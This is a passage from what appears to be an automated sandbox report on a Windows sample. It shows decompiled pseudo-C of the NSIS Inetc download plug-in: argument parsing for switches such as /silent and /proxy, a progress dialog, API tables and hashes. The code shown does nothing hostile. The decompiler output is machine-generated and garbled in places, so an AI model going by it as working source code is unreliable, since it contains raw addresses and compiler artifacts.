										LocalFree( *0x738157cc);
										_t72 =  *0x738157d0; // 0x0
										if(_t72 != 0) {
											LocalFree(_t72);
											_t72 =  *0x738157d0; // 0x0
										}
										if( *0x738157dc != 0) {
											LocalFree(_t72);
										}
										_t73 =  *0x738157e0; // 0x0
										if(_t73 != 0) {
											LocalFree(_t73);
										}
										_t74 =  *0x738157d4; // 0x0
										if(_t74 != 0) {
											LocalFree(_t74);
										}
										_t75 =  *0x738157e4; // 0x0
										if(_t75 != 0) {
											LocalFree(_t75);
										}
										_t76 =  *0x738157d8; // 0x0
										if(_t76 != 0) {
											LocalFree(_t76);
										}
										_t77 =  *0x73815ab0; // 0x314c168
										 *0x738157e0 = 0;
										 *0x738157d0 = 0;
										 *0x738157d8 = 0;
										 *0x738157d4 = 0;
										 *0x738157cc = 0;
										 *0x738157e4 = 0;
										 *0x73815ae8 = 0;
										 *0x73815adf = 0;
										if(_t77 == 0) {
											L137:
											_t78 =  *0x73815ab4; // 0x4
											return E73813B9E((_t78 << 5) + 0x73815000);
										} else {
											_t308 =  *0x73815ab4; // 0x4
											if(_t308 != 0) {
												goto L137;
											}
											_t309 =  *0x73815abc; // 0x0
											if(_t309 <= 0) {
												L135:
												E73813B9E(_t77);
												L136:
												LocalFree( *0x73815ab0);
												 *0x73815ab0 =  *0x73815ab0 & 0x00000000;
												goto L137;
											}
											_t310 =  *0x73815ade; // 0x0
											if(_t310 == 0) {
												goto L135;
											}
											_t251 = WideCharToMultiByte(0, 0, _t77, 0xffffffff, 0, 0, 0, 0);
											if(_t251 > 0) {
												_t36 = _t251 + 1; // 0x1
												_t254 = LocalAlloc(0x40, _t36);
												if(_t254 != 0) {
													if(WideCharToMultiByte(0, 0,  *0x73815ab0, 0xffffffff, _t254, _t251, 0, 0) > 0) {
														E73813B9E(_t254);
													}
													LocalFree(_t254);
												}
											}
											goto L136;
										}
									}
									_t252 = GetDlgItem( *0x73815ae0, 0x403);
									_t100 = GetDlgItem( *0x73815ae0, 0x3f8);
									_a8 = _a8 & 0x00000000;
									_a16 = _a16 & 0x00000000;
									_t256 = _t100;
									if( *0x73815ad8 == 0) {
										ShowWindow( *0x73815ae4, 1);
										if( *0x73815ae0 != 0 &&  *0x73815ad9 == 0) {
											if(_t252 != 0) {
												_a8 = GetWindowLongA(_t252, 0xfffffff0);
												EnableWindow(_t252, 0);
											}
											if(_t256 != 0) {
												_a16 = IsWindowVisible(_t256);
												ShowWindow(_t256, 0);
											}
										}
									}
									while(IsWindow( *0x73815ae4) != 0) {
										_t104 = GetMessageA( &_v32, 0, 0, 0);
										__eflags = _t104;
										if(_t104 <= 0) {
											break;
										}
										_t115 = IsDialogMessageA( *0x73815ae4,  &_v32); // executed
										__eflags = _t115;
										if(_t115 == 0) {
											_t117 = IsDialogMessageA(_a4,  &_v32);
											__eflags = _t117;
											if(_t117 == 0) {
												_t119 = TranslateMessage( &_v32);
												__eflags = _t119;
												if(_t119 == 0) {
													DispatchMessageA( &_v32);
												}
											}
										}
									}
									if(WaitForSingleObject(_t227, 0xbb8) == 0x102) {
										TerminateThread(_t227, 1);
										 *0x73815ab4 = 6;
									}
									CloseHandle(_t227);
									if( *0x73815ad8 == 0) {
										_t107 =  *0x73815ae0; // 0x0
										if(_t107 != 0) {
											SetDlgItemTextA(_t107, 0x3ee, 0x73814150);
											if( *0x73815ad9 == 0) {
												if(_t252 != 0) {
													SetWindowLongA(_t252, 0xfffffff0, _a8);
												}
												if(_t256 != 0 && _a16 != 0) {
													ShowWindow(_t256, 5);
												}
											}
										}
									}
								}
								goto L111;
							}
						}
					}
					_t143 = lstrcmpiA(_t50, "/silent");
					__eflags = _t143;
					if(_t143 != 0) {
						_t144 = lstrcmpiA( *0x738157cc, "/caption");
						__eflags = _t144;
						if(_t144 != 0) {
							_t145 = lstrcmpiA( *0x738157cc, "/username");
							__eflags = _t145;
							if(_t145 != 0) {
								_t146 = lstrcmpiA( *0x738157cc, "/password");
								__eflags = _t146;
								if(_t146 != 0) {
									_t147 = lstrcmpiA( *0x738157cc, "/nocancel");
									__eflags = _t147;
									if(_t147 != 0) {
										_t148 = lstrcmpiA( *0x738157cc, "/nocookies");
										__eflags = _t148;
										if(_t148 != 0) {
											_t149 = lstrcmpiA( *0x738157cc, "/noproxy");
											__eflags = _t149;
											if(_t149 != 0) {
												_t150 = lstrcmpiA( *0x738157cc, "/popup");
												__eflags = _t150;
												if(_t150 != 0) {
													_t151 = lstrcmpiA( *0x738157cc, "/resume");
													__eflags = _t151;
													if(_t151 != 0) {
														_t152 = lstrcmpiA( *0x738157cc, "/translate");
														__eflags = _t152;
														if(_t152 != 0) {
															_t153 = lstrcmpiA( *0x738157cc, "/banner");
															__eflags = _t153;
															if(_t153 != 0) {
																_t154 = lstrcmpiA( *0x738157cc, "/canceltext");
																__eflags = _t154;
																if(_t154 != 0) {
																	_t155 = lstrcmpiA( *0x738157cc, "/question");
																	__eflags = _t155;
																	if(_t155 != 0) {
																		_t156 = lstrcmpiA( *0x738157cc, "/useragent");
																		__eflags = _t156;
																		if(_t156 != 0) {
																			_t157 = lstrcmpiA( *0x738157cc, "/proxy");
																			__eflags = _t157;
																			if(_t157 != 0) {
																				_t158 = lstrcmpiA( *0x738157cc, "/connecttimeout");
																				__eflags = _t158;
																				if(_t158 != 0) {
																					_t159 = lstrcmpiA( *0x738157cc, "/receivetimeout");
																					__eflags = _t159;
																					if(_t159 != 0) {
																						_t160 = lstrcmpiA( *0x738157cc, "/header");
																						__eflags = _t160;
																						if(_t160 != 0) {
																							__eflags =  *0x73815adf;
																							if( *0x73815adf != 0) {
																								L53:
																								_t161 = lstrcmpiA( *0x738157cc, "/file");
																								__eflags = _t161;
																								if(_t161 != 0) {
																									goto L62;
																								}
																								_t258 = CreateFileA( *0x738157e4, 0x80000000,  &(_t161->nLength), _t161, 3, _t161, _t161);
																								__eflags = _t258 - 0xffffffff;
																								if(_t258 == 0xffffffff) {
																									 *0x73815ab4 = 0xb;
																									goto L112;
																								}
																								_t164 = GetFileSize(_t258, 0);
																								 *0x73815aac = _t164;
																								__eflags = _t164;
																								if(_t164 == 0) {
																									L74:
																									CloseHandle(_t258);
																									 *0x73815ab4 = 0xd;
																									goto L112;
																								}
																								_t166 = E7381102E( *0x738157e4, 0x5c);
																								__eflags = _t166;
																								if(_t166 == 0) {
																									_t167 =  *0x738157e4; // 0x0
																								} else {
																									_t167 = E73811049( *0x738157e4, 0x5c) + 1;
																								}
																								wsprintfA(0x738159a8, "Filename: %s", _t167);
																								_t261 = _t261 + 0xc;
																								LocalFree( *0x738157e4);
																								_t170 = LocalAlloc(0x40,  *0x73815aac);
																								_t230 =  &_a8;
																								 *0x738157e4 = _t170;
																								_t171 = ReadFile(_t258, _t170,  *0x73815aac,  &_a8, 0);
																								__eflags = _t171;
																								if(_t171 == 0) {
																									goto L74;
																								} else {
																									__eflags = _a8 -  *0x73815aac; // 0x0
																									if(__eflags != 0) {
																										goto L74;
																									}
																									CloseHandle(_t258);
																									goto L62;
																								}
																							}
																							_t175 = lstrcmpiA( *0x738157cc, "/tostackconv");
																							asm("sbb al, al");
																							_t177 =  ~_t175 + 1;
																							__eflags = _t177;
																							 *0x73815ade = _t177;
																							if(_t177 != 0) {
																								L51:
																								_t178 = LocalAlloc(0x40, _t250); // executed
																								 *0x73815abc =  *0x73815abc & 0x00000000;
																								__eflags =  *0x73815abc;
																								_push("file");
																								 *0x73815ab0 = _t178;
																								_push(0x738156c8);
																								L52:
																								lstrcpyA();
																								goto L62;
																							}
																							_t180 = lstrcmpiA( *0x738157cc, "/tostack");
																							__eflags = _t180;
																							if(_t180 != 0) {
																								goto L53;
																							}
																							goto L51;
																						}
																						_t181 = LocalAlloc(0x40, _t250);
																						 *0x738157d8 = _t181;
																						goto L46;
																					}
																					E73813B5A( *0x738157cc);
																					 *0x73815ac8 = E73813B34( *0x738157cc) * 0x3e8;
																					goto L62;
																				}
																				E73813B5A( *0x738157cc);
																				 *0x73815ac4 = E73813B34( *0x738157cc) * 0x3e8;
																				goto L62;
																			}
																			 *0x738157d4 = LocalAlloc(0x40, _t250);
																			E73813B5A(_t189);
																			 *0x73815ad4 = 3;
																			goto L62;
																		}
																		_push("NSIS_Inetc (Mozilla)");
																		goto L47;
																	}
																	 *0x738157e0 = LocalAlloc(0x40, _t250);
																	E73813B5A(_t191);
																	_t193 =  *0x738157e0; // 0x0
																	__eflags =  *_t193;
																	if( *_t193 != 0) {
																		goto L62;
																	}
																	_push("Are you sure that you want to stop download?");
																	_push(_t193);
																	goto L52;
																}
																_push(0x738157e8);
																goto L47;
															}
															 *0x73815ad9 =  &(_t153->nLength);
															_t181 = LocalAlloc(0x40, _t250);
															 *0x738157dc = _t181;
															goto L46;
														}
														__eflags =  *0x73815ad9 - _t152;
														if( *0x73815ad9 == _t152) {
															E73813B5A("Downloading %s");
															E73813B5A("Connecting ...");
															E73813B5A("second");
															E73813B5A("minute");
															E73813B5A("hour");
															E73813B5A("s");
															_push("%dkB (%d%%) of %dkB @ %d.%01dkB/s");
														} else {
															E73813B5A(0x73815af0);
															E73813B5A("Downloading");
															E73813B5A("Connecting");
															lstrcpyA("Connecting", "Connecting");
															E73813B5A("Downloading %s");
															E73813B5A("Connecting ...");
															E73813B5A("%dkB (%d%%) of %dkB @ %d.%01dkB/s");
															_push("second");
														}
														E73813B5A();
														goto L47;
													} else {
														E73813B5A( *0x738157cc);
														_t210 = lstrlenA( *0x738157cc);
														__eflags = _t210;
														if(_t210 > 0) {
															lstrcpyA("Your internet connection seems to be not permitted or dropped out!\nPlease reconnect and click Retry to resume installation.",  *0x738157cc);
														}
														 *0x73815ada = 1;
														goto L62;
													}
												} else {
													 *0x73815ad9 =  &(_t150->nLength);
													_t181 = LocalAlloc(0x40, _t250);
													 *0x738157d0 = _t181;
													goto L46;
												}
											} else {
												 *0x73815ad4 =  &(_t149->nLength);
												goto L62;
											}
										} else {
											 *0x73815add =  &(_t148->nLength);
											goto L62;
										}
									} else {
										 *0x73815adb =  &(_t147->nLength);
										goto L62;
									}
								} else {
									_t181 =  &_v96;
									goto L46;
								}
							} else {
								_t181 =  &_v160;
								L46:
								_push(_t181);
								goto L47;
							}
						} else {
							_push(0x73815828);
							L47:
							E73813B5A();
							goto L62;
						}
					} else {
						 *0x73815ad8 =  &(_t143->nLength);
						L62:
						_t49 = E73813B5A( *0x738157cc);
						continue;
					}
				}
				_t50 =  *0x738157cc; // 0x3146150
				goto L65;
			}

0x73813029
0x7381302f
0x7381303b
0x7381303e
0x73813046
0x73813049
0x73813051
0x73813054
0x7381305f
0x73813065
0x7381306b
0x73813071
0x73813077
0x7381307d
0x73813083
0x73813089
0x7381308f
0x73813095
0x7381309a
0x738130a0
0x738130a6
0x738130ac
0x738130b2
0x738130b8
0x738130c4
0x738130c6
0x738130cc
0x738130d2
0x738130d5
0x738130e6
0x738130ee
0x738130f4
0x738130fa
0x738130fa
0x73813110
0x73813111
0x73813115
0x7381311b
0x738135d2
0x7381312b
0x73813130
0x73813133
0x738135df
0x738135e0
0x738135ec
0x738135f8
0x738135f8
0x738135fe
0x7381361f
0x73813625
0x7381363b
0x73813640
0x73813640
0x73813643
0x73813648
0x738136b4
0x738136b4
0x00000000
0x7381364a
0x73813654
0x7381365a
0x73813661
0x00000000
0x7381366c
0x7381367d
0x73813687
0x738136ba
0x738136ba
0x738136c0
0x738136c8
0x738136e0
0x738136ca
0x738136d5
0x738136d6
0x738136d9
0x738136d9
0x738136e7
0x738136eb
0x738136f2
0x738136f5
0x738136f5
0x738136fd
0x73813716
0x73813716
0x7381371c
0x73813728
0x7381372a
0x7381372f
0x73813734
0x7381373b
0x7381373e
0x73813741
0x73813744
0x73813745
0x73813751
0x73813754
0x73813755
0x73813758
0x73813762
0x73813768
0x7381376f
0x7381392d
0x73813937
0x7381393e
0x73813951
0x73813957
0x73813960
0x73813966
0x73813966
0x73813969
0x73813775
0x73813784
0x7381378a
0x7381378e
0x7381391b
0x73813925
0x73813972
0x73813978
0x73813978
0x73813983
0x7381399e
0x738139a4
0x738139ab
0x738139ae
0x738139b4
0x738139b4
0x738139c0
0x738139c3
0x738139c3
0x738139c9
0x738139d0
0x738139d3
0x738139d3
0x738139d9
0x738139e0
0x738139e3
0x738139e3
0x738139e9
0x738139f0
0x738139f3
0x738139f3
0x738139f9
0x73813a00
0x73813a03
0x73813a03
0x73813a09
0x73813a10
0x73813a16
0x73813a1c
0x73813a22
0x73813a28
0x73813a2e
0x73813a34
0x73813a3a
0x73813a42
0x73813ac3
0x73813ac3
0x73813ada
0x73813a44
0x73813a44
0x73813a4a
0x00000000
0x00000000
0x73813a4c
0x73813a52
0x73813aaa
0x73813aab
0x73813ab0
0x73813ab6
0x73813abc
0x00000000
0x73813abc
0x73813a54
0x73813a5a
0x00000000
0x00000000
0x73813a6d
0x73813a71
0x73813a73
0x73813a7f
0x73813a83
0x73813a99
0x73813a9c
0x73813a9c
0x73813aa2
0x73813aa2
0x73813a83
0x00000000
0x73813a71
0x73813a42
0x738137b2
0x738137b4
0x738137b6
0x738137ba
0x738137c5
0x738137c7
0x738137d7
0x738137e4
0x738137f9
0x73813807
0x7381380a
0x7381380a
0x73813812
0x7381381e
0x73813821
0x73813821
0x73813812
0x738137e4
0x73813879
0x73813832
0x73813838
0x7381383a
0x00000000
0x00000000
0x73813846
0x7381384c
0x7381384e
0x73813857
0x7381385d
0x7381385f
0x73813865
0x7381386b
0x7381386d
0x73813873
0x73813873
0x7381386d
0x7381385f
0x7381384e
0x7381389a
0x738138a1
0x738138a7
0x738138a7
0x738138b2
0x738138bf
0x738138c5
0x738138cc
0x738138dd
0x738138ea
0x738138f2
0x738138fa
0x738138fa
0x73813902
0x7381390d
0x7381390d
0x73813902
0x738138ea
0x738138cc
0x738138bf
0x00000000
0x7381376f
0x73813661
0x73813648
0x7381313f
0x73813141
0x73813143
0x7381315b
0x7381315d
0x7381315f
0x73813176
0x73813178
0x7381317a
0x73813192
0x73813194
0x73813196
0x738131ab
0x738131ad
0x738131af
0x738131c7
0x738131c9
0x738131cb
0x738131e3
0x738131e5
0x738131e7
0x738131ff
0x73813201
0x73813203
0x73813229
0x7381322b
0x7381322d
0x7381326f
0x73813271
0x73813273
0x7381332b
0x7381332d
0x7381332f
0x73813355
0x73813357
0x73813359
0x73813370
0x73813372
0x73813374
0x738133ae
0x738133b0
0x738133b2
0x738133c9
0x738133cb
0x738133cd
0x738133fd
0x738133ff
0x73813401
0x73813434
0x73813436
0x73813438
0x7381346b
0x7381346d
0x7381346f
0x7381348a
0x73813491
0x738134e4
0x738134ef
0x738134f1
0x738134f3
0x00000000
0x00000000
0x73813511
0x73813513
0x73813516
0x738136a5
0x00000000
0x738136a5
0x7381351f
0x73813525
0x7381352a
0x7381352c
0x7381368f
0x73813690
0x73813696
0x00000000
0x73813696
0x7381353a
0x73813541
0x73813543
0x73813557
0x73813545
0x73813554
0x73813554
0x73813567
0x7381356d
0x73813576
0x73813584
0x7381358c
0x73813596
0x7381359d
0x738135a3
0x738135a5
0x00000000
0x738135ab
0x738135ae
0x738135b4
0x00000000
0x00000000
0x738135bb
0x00000000
0x738135c1
0x738135a5
0x7381349e
0x738134a2
0x738134a4
0x738134a4
0x738134a6
0x738134ab
0x738134be
0x738134c1
0x738134c7
0x738134c7
0x738134ce
0x738134d3
0x738134d8
0x738134dd
0x738134dd
0x00000000
0x738134dd
0x738134b8
0x738134ba
0x738134bc
0x00000000
0x00000000
0x00000000
0x738134bc
0x73813474
0x7381347a
0x00000000
0x7381347a
0x73813440
0x73813456
0x00000000
0x73813456
0x73813409
0x7381341f
0x00000000
0x7381341f
0x738133d9
0x738133de
0x738133e3
0x00000000
0x738133e3
0x738133b4
0x00000000
0x738133b4
0x73813380
0x73813385
0x7381338a
0x7381338f
0x73813392
0x00000000
0x00000000
0x73813398
0x7381339d
0x00000000
0x7381339d
0x7381335b
0x00000000
0x7381335b
0x73813335
0x7381333a
0x73813340
0x00000000
0x73813340
0x73813279
0x7381327f
0x738132d5
0x738132df
0x738132e9
0x738132f3
0x738132fd
0x73813307
0x7381330c
0x73813281
0x73813286
0x73813290
0x7381329a
0x738132a9
0x738132b0
0x738132ba
0x738132c4
0x738132c9
0x738132c9
0x73813311
0x00000000
0x7381322f
0x73813235
0x73813240
0x73813246
0x73813248
0x73813255
0x73813255
0x7381325a
0x00000000
0x7381325a
0x73813205
0x73813209
0x7381320e
0x73813214
0x00000000
0x73813214
0x738131e9
0x738131ea
0x00000000
0x738131ea
0x738131cd
0x738131ce
0x00000000
0x738131ce
0x738131b1
0x738131b2
0x00000000
0x738131b2
0x73813198
0x73813198
0x00000000
0x73813198
0x7381317c
0x7381317c
0x7381347f
0x7381347f
0x00000000
0x7381347f
0x73813161
0x73813161
0x73813480
0x73813480
0x00000000
0x73813480
0x73813145
0x73813146
0x738135c7
0x738135cd
0x00000000
0x738135cd
0x73813143
0x738135da
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 738130B8
lstrcpyA.KERNEL32(00000000), ref: 738130E6
lstrlenA.KERNEL32 ref: 738130EE
lstrcmpiA.KERNEL32(03146150,/silent,00000000), ref: 7381313F
lstrcmpiA.KERNEL32(/caption), ref: 7381315B
lstrcpyA.KERNEL32(NSIS_Inetc (Mozilla),NSIS_Inetc (Mozilla),03146150,00000000), ref: 738135F8
wsprintfA.USER32 ref: 7381361F
lstrlenA.KERNEL32(03146150,03146150,73815BB0), ref: 73813634
FindWindowExA.USER32 ref: 73813654
SetDlgItemTextA.USER32 ref: 73813687
CloseHandle.KERNEL32(00000000), ref: 73813690
#17.COMCTL32(03146150,00000000), ref: 738136B4
GetWindowLongA.USER32 ref: 73813702
SetWindowLongA.USER32 ref: 73813716
GetTickCount.KERNEL32 ref: 7381371C

Part of subcall function 73813B5A: lstrcpyA.KERNEL32(00000000,74B48174,74B48170), ref: 73813B7B
Part of subcall function 73813B5A: GlobalFree.KERNEL32 ref: 73813B8C

CreateDialogParamA.USER32(?,00000000,7381119C,00000000), ref: 73813762
CreateThread.KERNEL32 ref: 73813784
GetDlgItem.USER32 ref: 738137A5
GetDlgItem.USER32 ref: 738137B4
ShowWindow.USER32(00000001), ref: 738137D7
GetWindowLongA.USER32 ref: 738137FE
EnableWindow.USER32(00000000,00000000), ref: 7381380A
IsWindowVisible.USER32 ref: 73813815
ShowWindow.USER32(00000000,00000000), ref: 73813821
GetMessageA.USER32 ref: 73813832
IsDialogMessageA.USER32(?), ref: 73813846
IsDialogMessageA.USER32(?,?), ref: 73813857
TranslateMessage.USER32(?), ref: 73813865
DispatchMessageA.USER32 ref: 73813873
IsWindow.USER32 ref: 7381387F
WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 7381388F
TerminateThread.KERNEL32(00000000,00000001), ref: 738138A1
CloseHandle.KERNEL32(00000000), ref: 738138B2
SetDlgItemTextA.USER32 ref: 738138DD
SetWindowLongA.USER32 ref: 738138FA
ShowWindow.USER32(00000000,00000005), ref: 7381390D
DestroyWindow.USER32 ref: 73813925
GetLastError.KERNEL32 ref: 73813937
lstrlenA.KERNEL32(-73814FFC, (Err=%d),00000000), ref: 73813951
wsprintfA.USER32 ref: 73813969
lstrcmpiA.KERNEL32(/end), ref: 73813992
LocalFree.KERNEL32 ref: 7381399E
LocalFree.KERNEL32(00000000), ref: 738139AE
LocalFree.KERNEL32(00000000), ref: 738139C3
LocalFree.KERNEL32(00000000), ref: 738139D3
LocalFree.KERNEL32(00000000), ref: 738139E3
LocalFree.KERNEL32(00000000), ref: 738139F3
LocalFree.KERNEL32(00000000), ref: 73813A03
WideCharToMultiByte.KERNEL32(00000000,00000000,0314C168,000000FF,00000000,00000000,00000000,00000000), ref: 73813A6B
LocalAlloc.KERNEL32(00000040,00000001), ref: 73813A79
WideCharToMultiByte.KERNEL32(00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 73813A95
LocalFree.KERNEL32(00000000), ref: 73813AA2
LocalFree.KERNEL32(0314C168), ref: 73813AB6

Strings

file, xrefs: 738134CE
Are you sure that you want to stop download?, xrefs: 73813398
/username, xrefs: 7381316B
Filename: %s, xrefs: 7381355D
NSIS_Inetc (Mozilla), xrefs: 738135EE
/connecttimeout, xrefs: 738133F2
%s:%s, xrefs: 73813614
/useragent, xrefs: 738133A3
Inetc plug-in, xrefs: 73813673
pvep, xrefs: 73813089
#32770, xrefs: 7381364C
(%d %s%s remaining), xrefs: 73813316
NSIS_Inetc (Mozilla), xrefs: 738130A6, 738133B4, 738135E5, 738135F3
Downloading %s, xrefs: 738132AB, 738132D0
Your internet connection seems to be not permitted or dropped out!Please reconnect and click Retry to resume installation., xrefs: 73813250
/end, xrefs: 73813987
/tostackconv, xrefs: 73813493
/banner, xrefs: 73813320
/resume, xrefs: 7381321E
/silent, xrefs: 73813139
/noproxy, xrefs: 738131D8
/password, xrefs: 73813187
/receivetimeout, xrefs: 73813429
/header, xrefs: 73813460
Connecting ..., xrefs: 738132B5, 738132DA
second, xrefs: 738132C9, 738132E4
/canceltext, xrefs: 7381334A
Downloading, xrefs: 7381328B
%dkB (%d%%) of %dkB @ %d.%01dkB/s, xrefs: 738132BF, 7381330C
/nocookies, xrefs: 738131BC
/question, xrefs: 73813365
Connecting, xrefs: 73813295, 7381329F
/caption, xrefs: 73813150
/nocancel, xrefs: 738131A0
hour, xrefs: 738132F8
/popup, xrefs: 738131F4
Connecting, xrefs: 738132A4
(Err=%d), xrefs: 73813946
/translate, xrefs: 73813264
/file, xrefs: 738134E4
/proxy, xrefs: 738133BE
minute, xrefs: 738132EE
/tostack, xrefs: 738134AD

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: Window$Local$Free$Message$ItemLong$DialogShowlstrcmpilstrcpylstrlen$AllocByteCharCloseCreateHandleMultiTextThreadWidewsprintf$CountDestroyDispatchEnableErrorFindGlobalLastObjectParamSingleTerminateTickTranslateVisibleWait
String ID: (%d %s%s remaining)$ (Err=%d)$#32770$%dkB (%d%%) of %dkB @ %d.%01dkB/s$%s:%s$/banner$/canceltext$/caption$/connecttimeout$/end$/file$/header$/nocancel$/nocookies$/noproxy$/password$/popup$/proxy$/question$/receivetimeout$/resume$/silent$/tostack$/tostackconv$/translate$/useragent$/username$Are you sure that you want to stop download?$Connecting$Connecting$Connecting ...$Downloading$Downloading %s$Filename: %s$Inetc plug-in$NSIS_Inetc (Mozilla)$NSIS_Inetc (Mozilla)$Your internet connection seems to be not permitted or dropped out!Please reconnect and click Retry to resume installation.$file$hour$minute$pvep$second
API String ID: 3673626485-2989047162
Opcode ID: 41148bd9678909ab1629e4a0d8ad8711dda7f1a30def6f0572d38538848f4877
Instruction ID: 30f3620b9b792e2ba57a845f7242dcc6a7a86a15f8063eb57248d304b9428c15
Opcode Fuzzy Hash: 41148bd9678909ab1629e4a0d8ad8711dda7f1a30def6f0572d38538848f4877
Instruction Fuzzy Hash: 0B425FB3540B13EFE702BBEACC55F5A3B7BE700241F38421DE95A97285E7B185248B20

Uniqueness

Uniqueness Score: -1.00%

Function 73811E77, Relevance: 61.4, APIs: 29, Strings: 6, Instructions: 163
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E73811E77(void* __ecx, struct HWND__* _a4) {
				struct HWND__* _v8;
				int _v12;
				int _t9;
				long _t28;
				int _t30;
				struct HWND__* _t45;
				struct HWND__* _t47;
				struct HWND__* _t51;

				_t51 = _a4;
				_t47 = GetDlgItem(_t51, 2);
				if( *0x73815ae0 == 0) {
					L9:
					if( *0x73815adb != 0) {
						if(_t47 != 0) {
							ShowWindow(_t47, 0);
						}
						if( *0x73815ad9 != 0) {
							SetWindowLongA(_t51, 0xfffffff0, GetWindowLongA(_t51, 0xfffffff0) ^ 0x00080000);
						}
					}
					SendDlgItemMessageA(_t51, 0x3ed, 0x401, 0, 0x1900000);
					if( *0x738157dc != 0) {
						SendDlgItemMessageA(_t51, 0x3f1, 0x170, LoadIconA(GetModuleHandleA(0), 0x67), 0);
						SetDlgItemTextA(_t51, 0x3f0,  *0x738157dc);
						_t20 =  ==  ? "Inetc plug-in" : 0x73815828;
						SetWindowTextA(_t51,  ==  ? "Inetc plug-in" : 0x73815828);
					}
					_t9 = SetTimer(_t51, 1, 0x3e8, 0); // executed
					if( *0x73815af0 != 0) {
						SetDlgItemTextA(_t51, 0x3f1, 0x73815af0);
						SetDlgItemTextA(_t51, 0x3f2, "Downloading %s");
						SetDlgItemTextA(_t51, 0x3f3, "Connecting ...");
						SetDlgItemTextA(_t51, 0x3f4, "%dkB (%d%%) of %dkB @ %d.%01dkB/s");
						SetDlgItemTextA(_t51, 0x3f5, "second");
						_t9 = SetDlgItemTextA(_t51, 0x3f6, " (%d %s%s remaining)");
					}
					return _t9;
				}
				_v8 = GetDlgItem(_t51, 0x3ed);
				_t45 = GetDlgItem( *0x73815ae0, 0x3ec);
				_t28 = 0x56000000;
				if(_t45 != 0) {
					_t28 = GetWindowLongA(_t45, 0xfffffff0) | 0x56000000;
				}
				SetWindowLongA(_v8, 0xfffffff0, _t28);
				if( *0x73815ad9 == 0) {
					_t30 = SendMessageA( *0x73815ae0, 0x31, 0, 0);
					_v12 = _t30;
					if(_t30 != 0) {
						SendDlgItemMessageA(_t51, 0x3e9, 0x30, _t30, 0);
						SendDlgItemMessageA(_t51, 2, 0x30, _v12, 0);
					}
					if( *0x738157e8 == 0) {
						GetWindowTextA(GetDlgItem(GetParent( *0x73815ae0), 2), 0x738157e8, 0x40);
					}
					SetWindowTextA(_t47, 0x738157e8);
					SetWindowPos(_v8, 0, 0, 0, 0, 0, 3);
				}
				goto L9;
			}

0x73811e7e
0x73811e98
0x73811e9a
0x73811f6a
0x73811f71
0x73811f75
0x73811f7a
0x73811f7a
0x73811f87
0x73811f9b
0x73811f9b
0x73811f87
0x73811fb3
0x73811fc2
0x73811fe3
0x73811ff1
0x73812004
0x73812009
0x73812009
0x73812019
0x73812026
0x73812033
0x73812040
0x7381204d
0x7381205a
0x73812067
0x73812074
0x73812074
0x7381207a
0x7381207a
0x73811eb7
0x73811ec0
0x73811ec2
0x73811ec9
0x73811ed4
0x73811ed4
0x73811edf
0x73811eec
0x73811efa
0x73811f00
0x73811f05
0x73811f12
0x73811f1e
0x73811f1e
0x73811f27
0x73811f46
0x73811f46
0x73811f52
0x73811f64
0x73811f64
0x00000000

APIs

GetDlgItem.USER32 ref: 73811E85
GetDlgItem.USER32 ref: 73811EA6
GetDlgItem.USER32 ref: 73811EBA
GetWindowLongA.USER32 ref: 73811ECE
SetWindowLongA.USER32 ref: 73811EDF
SendMessageA.USER32(00000031,00000000,00000000), ref: 73811EFA
SendDlgItemMessageA.USER32(?,000003E9,00000030,00000000,00000000), ref: 73811F12
SendDlgItemMessageA.USER32(?,00000002,00000030,?,00000000), ref: 73811F1E
GetParent.USER32(00000002), ref: 73811F38
GetDlgItem.USER32 ref: 73811F3F
GetWindowTextA.USER32 ref: 73811F46
SetWindowTextA.USER32(00000000,738157E8), ref: 73811F52
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?,?,738112FB,?), ref: 73811F64
ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,738112FB,?), ref: 73811F7A
GetWindowLongA.USER32 ref: 73811F8C
SetWindowLongA.USER32 ref: 73811F9B
SendDlgItemMessageA.USER32(?,000003ED,00000401,00000000,01900000), ref: 73811FB3
GetModuleHandleA.KERNEL32(00000000,00000067,00000000,?,?,?,?,?,?,738112FB,?), ref: 73811FCA
LoadIconA.USER32(00000000), ref: 73811FD1
SendDlgItemMessageA.USER32(?,000003F1,00000170,00000000), ref: 73811FE3
SetDlgItemTextA.USER32 ref: 73811FF1
SetWindowTextA.USER32(?,73815828), ref: 73812009
SetTimer.USER32(?,00000001,000003E8,00000000), ref: 73812019
SetDlgItemTextA.USER32 ref: 73812033
SetDlgItemTextA.USER32 ref: 73812040
SetDlgItemTextA.USER32 ref: 7381204D
SetDlgItemTextA.USER32 ref: 7381205A
SetDlgItemTextA.USER32 ref: 73812067
SetDlgItemTextA.USER32 ref: 73812074

Strings

(%d %s%s remaining), xrefs: 73812069
Downloading %s, xrefs: 73812035
Connecting ..., xrefs: 73812042
second, xrefs: 7381205C
%dkB (%d%%) of %dkB @ %d.%01dkB/s, xrefs: 7381204F
Inetc plug-in, xrefs: 73811FFA

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: Item$Text$Window$MessageSend$Long$HandleIconLoadModuleParentShowTimer
String ID: (%d %s%s remaining)$%dkB (%d%%) of %dkB @ %d.%01dkB/s$Connecting ...$Downloading %s$Inetc plug-in$second
API String ID: 3891978239-2469666409
